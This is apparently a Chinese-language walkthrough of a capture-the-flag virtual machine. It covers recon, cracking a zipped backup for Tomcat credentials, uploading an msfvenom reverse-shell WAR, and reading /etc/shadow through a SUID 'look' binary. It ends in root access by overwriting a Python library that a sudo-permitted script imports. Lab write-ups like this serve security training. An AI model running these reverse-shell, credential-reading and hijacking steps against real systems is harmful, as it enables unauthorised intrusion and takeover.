环境准备
靶机链接:百度网盘 请输入提取码
提取码:o643
虚拟机网络链接模式:桥接模式
攻击机系统:kali linux 2021.1
信息收集
1.arp-scan -l 探测目标靶机ip
2.nmap -p- -A -T4 192.168.1.103 探测目标靶机开放端口和服务
3.gobuster dir -u http://192.168.1.103:8080 -w /usr/share/wordlists/dirb/big.txt -t 50 -x php,txt,html,js,php.bak,txt.bak,html.bak,json,git,git.bak,zip,zip.bak
探测到一个backup.zip 的文件 将他下载下来
漏洞利用
1.wget http://192.168.1.103:8080/backup.zip
将文件下载下来进行解压!
2.gzip -d rockyou.txt.gz //解压字典里的密码文件
fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u backup.zip //解出文件密码
3.cat tomcat-users.xml
username="manager" password="melehifokivai"
username="admin" password="melehifokivai"
4.80端口扫描出来有一个文件上传的目录,用msfvenom生成war包,上传上去后开启监听,点击shell1.war触发木马,成功回弹shell
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.105 LPORT=4444 -f war > shell1.war
5.进去之后尝试出jaye的密码
6.登录ssh ,反弹交互式shell python3 -c "import pty;pty.spawn('/bin/bash')"
权限提升
1.用find命令查看suid权限文件,发现一个look
find / -perm -u=s -type f 2>/dev/null
2.look命令就是查找的意思
./look ' ' "$LFILE"
./look '' /etc/passwd
./look '' /etc/shadow
$6$bQ8rY/73PoUA4lFX$i/aKxdkuh5hF8D78k50BZ4eInDWklwQgmmpakv/gsuzTodngjB340R1wXQ8qWhY2cyMwi.61HJ36qXGvFHJGY/
暴力破解下root密码 ,失败!
3.再暴力破解randy用户密码
john --wordlist=/usr/share/wordlists/rockyou.txt hash
07051986randy
4.ssh登录下
5.sudo -l 发现一个.py文件有权限,查看.py文件后发现,他一直调用base64
6.最后发现没有写入权限,最终目标在base64.py
7.查看权限后。确认可以写入提权脚本
ls -la /usr/lib/python3.8/base64.py
8.echo 'import os;os.system("/bin/bash")' > /usr/lib/python3.8/base64.py
sudo /usr/bin/python3.8 /home/randy/randombase64.py //执行之后就会触发写入的提权脚本;
最终成功提权,进入root 成功拿下!!!